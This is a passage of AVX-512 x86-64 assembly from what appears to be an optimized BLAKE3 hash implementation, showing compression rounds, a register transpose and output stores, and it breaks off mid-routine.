vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm19
vpaddd ymm1,ymm1,ymm26
vpaddd ymm2,ymm2,ymm29
vpaddd ymm3,ymm3,ymm23
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm20
vpaddd ymm1,ymm1,ymm28
vpaddd ymm2,ymm2,ymm18
vpaddd ymm3,ymm3,ymm30
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm22
vpaddd ymm1,ymm1,ymm25
vpaddd ymm2,ymm2,ymm27
vpaddd ymm3,ymm3,ymm24
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm21
vpaddd ymm1,ymm1,ymm16
vpaddd ymm2,ymm2,ymm31
vpaddd ymm3,ymm3,ymm17
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm26
vpaddd ymm1,ymm1,ymm28
vpaddd ymm2,ymm2,ymm30
vpaddd ymm3,ymm3,ymm29
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm23
vpaddd ymm1,ymm1,ymm25
vpaddd ymm2,ymm2,ymm19
vpaddd ymm3,ymm3,ymm31
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm20
vpaddd ymm1,ymm1,ymm27
vpaddd ymm2,ymm2,ymm21
vpaddd ymm3,ymm3,ymm17
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm16
vpaddd ymm1,ymm1,ymm18
vpaddd ymm2,ymm2,ymm24
vpaddd ymm3,ymm3,ymm22
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm28
vpaddd ymm1,ymm1,ymm25
vpaddd ymm2,ymm2,ymm31
vpaddd ymm3,ymm3,ymm30
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm29
vpaddd ymm1,ymm1,ymm27
vpaddd ymm2,ymm2,ymm26
vpaddd ymm3,ymm3,ymm24
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm23
vpaddd ymm1,ymm1,ymm21
vpaddd ymm2,ymm2,ymm16
vpaddd ymm3,ymm3,ymm22
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm18
vpaddd ymm1,ymm1,ymm19
vpaddd ymm2,ymm2,ymm17
vpaddd ymm3,ymm3,ymm20
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm25
vpaddd ymm1,ymm1,ymm27
vpaddd ymm2,ymm2,ymm24
vpaddd ymm3,ymm3,ymm31
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm30
vpaddd ymm1,ymm1,ymm21
vpaddd ymm2,ymm2,ymm28
vpaddd ymm3,ymm3,ymm17
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm29
vpaddd ymm1,ymm1,ymm16
vpaddd ymm2,ymm2,ymm18
vpaddd ymm3,ymm3,ymm20
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm19
vpaddd ymm1,ymm1,ymm26
vpaddd ymm2,ymm2,ymm22
vpaddd ymm3,ymm3,ymm23
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm27
vpaddd ymm1,ymm1,ymm21
vpaddd ymm2,ymm2,ymm17
vpaddd ymm3,ymm3,ymm24
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm31
vpaddd ymm1,ymm1,ymm16
vpaddd ymm2,ymm2,ymm25
vpaddd ymm3,ymm3,ymm22
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm30
vpaddd ymm1,ymm1,ymm18
vpaddd ymm2,ymm2,ymm19
vpaddd ymm3,ymm3,ymm23
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm26
vpaddd ymm1,ymm1,ymm28
vpaddd ymm2,ymm2,ymm20
vpaddd ymm3,ymm3,ymm29
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpxor ymm0,ymm0,ymm8
vpxor ymm1,ymm1,ymm9
vpxor ymm2,ymm2,ymm10
vpxor ymm3,ymm3,ymm11
vpxor ymm4,ymm4,ymm12
vpxor ymm5,ymm5,ymm13
vpxor ymm6,ymm6,ymm14
vpxor ymm7,ymm7,ymm15
vpxord ymm8,ymm8,DWORD PTR [rdi]{1to8}
vpxord ymm9,ymm9,DWORD PTR [rdi+0x4]{1to8}
vpxord ymm10,ymm10,DWORD PTR [rdi+0x8]{1to8}
vpxord ymm11,ymm11,DWORD PTR [rdi+0xc]{1to8}
vpxord ymm12,ymm12,DWORD PTR [rdi+0x10]{1to8}
vpxord ymm13,ymm13,DWORD PTR [rdi+0x14]{1to8}
vpxord ymm14,ymm14,DWORD PTR [rdi+0x18]{1to8}
vpxord ymm15,ymm15,DWORD PTR [rdi+0x1c]{1to8}
vpunpckldq ymm16,ymm0,ymm1
vpunpckhdq ymm17,ymm0,ymm1
vpunpckldq ymm18,ymm2,ymm3
vpunpckhdq ymm19,ymm2,ymm3
vpunpckldq ymm20,ymm4,ymm5
vpunpckhdq ymm21,ymm4,ymm5
vpunpckldq ymm22,ymm6,ymm7
vpunpckhdq ymm23,ymm6,ymm7
vpunpckldq ymm24,ymm8,ymm9
vpunpckhdq ymm25,ymm8,ymm9
vpunpckldq ymm26,ymm10,ymm11
vpunpckhdq ymm27,ymm10,ymm11
vpunpckldq ymm28,ymm12,ymm13
vpunpckhdq ymm29,ymm12,ymm13
vpunpckldq ymm30,ymm14,ymm15
vpunpckhdq ymm31,ymm14,ymm15
vpunpcklqdq ymm0,ymm16,ymm18
vpunpckhqdq ymm1,ymm16,ymm18
vpunpcklqdq ymm2,ymm17,ymm19
vpunpckhqdq ymm3,ymm17,ymm19
vpunpcklqdq ymm4,ymm20,ymm22
vpunpckhqdq ymm5,ymm20,ymm22
vpunpcklqdq ymm6,ymm21,ymm23
vpunpckhqdq ymm7,ymm21,ymm23
vpunpcklqdq ymm8,ymm24,ymm26
vpunpckhqdq ymm9,ymm24,ymm26
vpunpcklqdq ymm10,ymm25,ymm27
vpunpckhqdq ymm11,ymm25,ymm27
vpunpcklqdq ymm12,ymm28,ymm30
vpunpckhqdq ymm13,ymm28,ymm30
vpunpcklqdq ymm14,ymm29,ymm31
vpunpckhqdq ymm15,ymm29,ymm31
vshufi32x4 ymm16,ymm0,ymm4,0x0
vshufi32x4 ymm17,ymm8,ymm12,0x0
vshufi32x4 ymm18,ymm1,ymm5,0x0
vshufi32x4 ymm19,ymm9,ymm13,0x0
vshufi32x4 ymm20,ymm2,ymm6,0x0
vshufi32x4 ymm21,ymm10,ymm14,0x0
vshufi32x4 ymm22,ymm3,ymm7,0x0
vshufi32x4 ymm23,ymm11,ymm15,0x0
vshufi32x4 ymm24,ymm0,ymm4,0x3
vshufi32x4 ymm25,ymm8,ymm12,0x3
vshufi32x4 ymm26,ymm1,ymm5,0x3
vshufi32x4 ymm27,ymm9,ymm13,0x3
vshufi32x4 ymm28,ymm2,ymm6,0x3
vshufi32x4 ymm29,ymm10,ymm14,0x3
vshufi32x4 ymm30,ymm3,ymm7,0x3
vshufi32x4 ymm31,ymm11,ymm15,0x3
vmovdqu32 YMMWORD PTR [r9],ymm16
vmovdqu32 YMMWORD PTR [r9+0x20],ymm17
vmovdqu32 YMMWORD PTR [r9+0x40],ymm18
vmovdqu32 YMMWORD PTR [r9+0x60],ymm19
vmovdqu32 YMMWORD PTR [r9+0x80],ymm20
vmovdqu32 YMMWORD PTR [r9+0xa0],ymm21
vmovdqu32 YMMWORD PTR [r9+0xc0],ymm22
vmovdqu32 YMMWORD PTR [r9+0xe0],ymm23
vmovdqu32 YMMWORD PTR [r9+0x100],ymm24
vmovdqu32 YMMWORD PTR [r9+0x120],ymm25
vmovdqu32 YMMWORD PTR [r9+0x140],ymm26
vmovdqu32 YMMWORD PTR [r9+0x160],ymm27
vmovdqu32 YMMWORD PTR [r9+0x180],ymm28
vmovdqu32 YMMWORD PTR [r9+0x1a0],ymm29
vmovdqu32 YMMWORD PTR [r9+0x1c0],ymm30
vmovdqu32 YMMWORD PTR [r9+0x1e0],ymm31
vmovdqa ymm0,YMMWORD PTR [rsp+0x20]
vmovdqa ymm1,YMMWORD PTR [rsp+0x60]
vmovdqa YMMWORD PTR [rsp],ymm0
vmovdqa YMMWORD PTR [rsp+0x40],ymm1
add r9,0x200
sub r10,0x8
2:
test r10,0x4
je 2f
vbroadcasti32x4 zmm0,XMMWORD PTR [rdi]
vbroadcasti32x4 zmm1,XMMWORD PTR [rdi+0x10]
vbroadcasti32x4 zmm2,XMMWORD PTR [BLAKE3_IV+rip]
vmovdqa xmm12,XMMWORD PTR [rsp]
vmovdqa xmm13,XMMWORD PTR [rsp+0x40]
vpunpckldq xmm14,xmm12,xmm13
vpunpckhdq xmm15,xmm12,xmm13
vpermq ymm14,ymm14,0xdc
vpermq ymm15,ymm15,0xdc
vpbroadcastd zmm12,edx
vinserti64x4 zmm13,zmm14,ymm15,0x1
mov eax,0x4444
kmovw k2,eax
vpblendmd zmm13{k2},zmm13,zmm12
vpbroadcastd zmm15,r8d
mov eax,0x8888
kmovw k4,eax
vpblendmd zmm3{k4},zmm13,zmm15
mov eax,0xaaaa
kmovw k3,eax
vbroadcasti32x4 zmm8,XMMWORD PTR [rsi]
vbroadcasti32x4 zmm9,XMMWORD PTR [rsi+0x10]
vshufps zmm4,zmm8,zmm9,0x88
vshufps zmm5,zmm8,zmm9,0xdd
vbroadcasti32x4 zmm8,XMMWORD PTR [rsi+0x20]
vbroadcasti32x4 zmm9,XMMWORD PTR [rsi+0x30]
vshufps zmm6,zmm8,zmm9,0x88
vshufps zmm7,zmm8,zmm9,0xdd
vpshufd zmm6,zmm6,0x93
vpshufd zmm7,zmm7,0x93
mov al,0x7
3:
vpaddd zmm0,zmm0,zmm4
vpaddd zmm0,zmm0,zmm1
vpxord zmm3,zmm3,zmm0
vprord zmm3,zmm3,0x10
vpaddd zmm2,zmm2,zmm3
vpxord zmm1,zmm1,zmm2
vprord zmm1,zmm1,0xc
vpaddd zmm0,zmm0,zmm5
vpaddd zmm0,zmm0,zmm1
vpxord zmm3,zmm3,zmm0
vprord zmm3,zmm3,0x8
vpaddd zmm2,zmm2,zmm3
vpxord zmm1,zmm1,zmm2
vprord zmm1,zmm1,0x7
vpshufd zmm0,zmm0,0x93
vpshufd zmm3,zmm3,0x4e
vpshufd zmm2,zmm2,0x39
vpaddd zmm0,zmm0,zmm6
vpaddd zmm0,zmm0,zmm1
vpxord zmm3,zmm3,zmm0
vprord zmm3,zmm3,0x10
vpaddd zmm2,zmm2,zmm3
vpxord zmm1,zmm1,zmm2
vprord zmm1,zmm1,0xc
vpaddd zmm0,zmm0,zmm7
vpaddd zmm0,zmm0,zmm1
vpxord zmm3,zmm3,zmm0
vprord zmm3,zmm3,0x8
vpaddd zmm2,zmm2,zmm3
vpxord zmm1,zmm1,zmm2
vprord zmm1,zmm1,0x7
vpshufd zmm0,zmm0,0x39
vpshufd zmm3,zmm3,0x4e
vpshufd zmm2,zmm2,0x93
dec al
je 3f
vshufps zmm8,zmm4,zmm5,0xd6
vpshufd zmm9,zmm4,0xf
vpshufd zmm4,zmm8,0x39
vshufps zmm8,zmm6,zmm7,0xfa
vpblendmd zmm9{k3},zmm9,zmm8
vpunpcklqdq zmm8,zmm7,zmm5
vpblendmd zmm8{k4},zmm8,zmm6
vpshufd zmm8,zmm8,0x78
vpunpckhdq zmm5,zmm5,zmm7
vpunpckldq zmm6,zmm6,zmm5
vpshufd zmm7,zmm6,0x1e
vmovdqa32 zmm5,zmm9
vmovdqa32 zmm6,zmm8
jmp 3b
3:
vpxord zmm0,zmm0,zmm2
vpxord zmm1,zmm1,zmm3
vbroadcasti32x4 zmm8,XMMWORD PTR [rdi]
vbroadcasti32x4 zmm9,XMMWORD PTR [rdi+0x10]
vpxord zmm2,zmm2,zmm8
vpxord zmm3,zmm3,zmm9
vmovdqu XMMWORD PTR [r9],xmm0
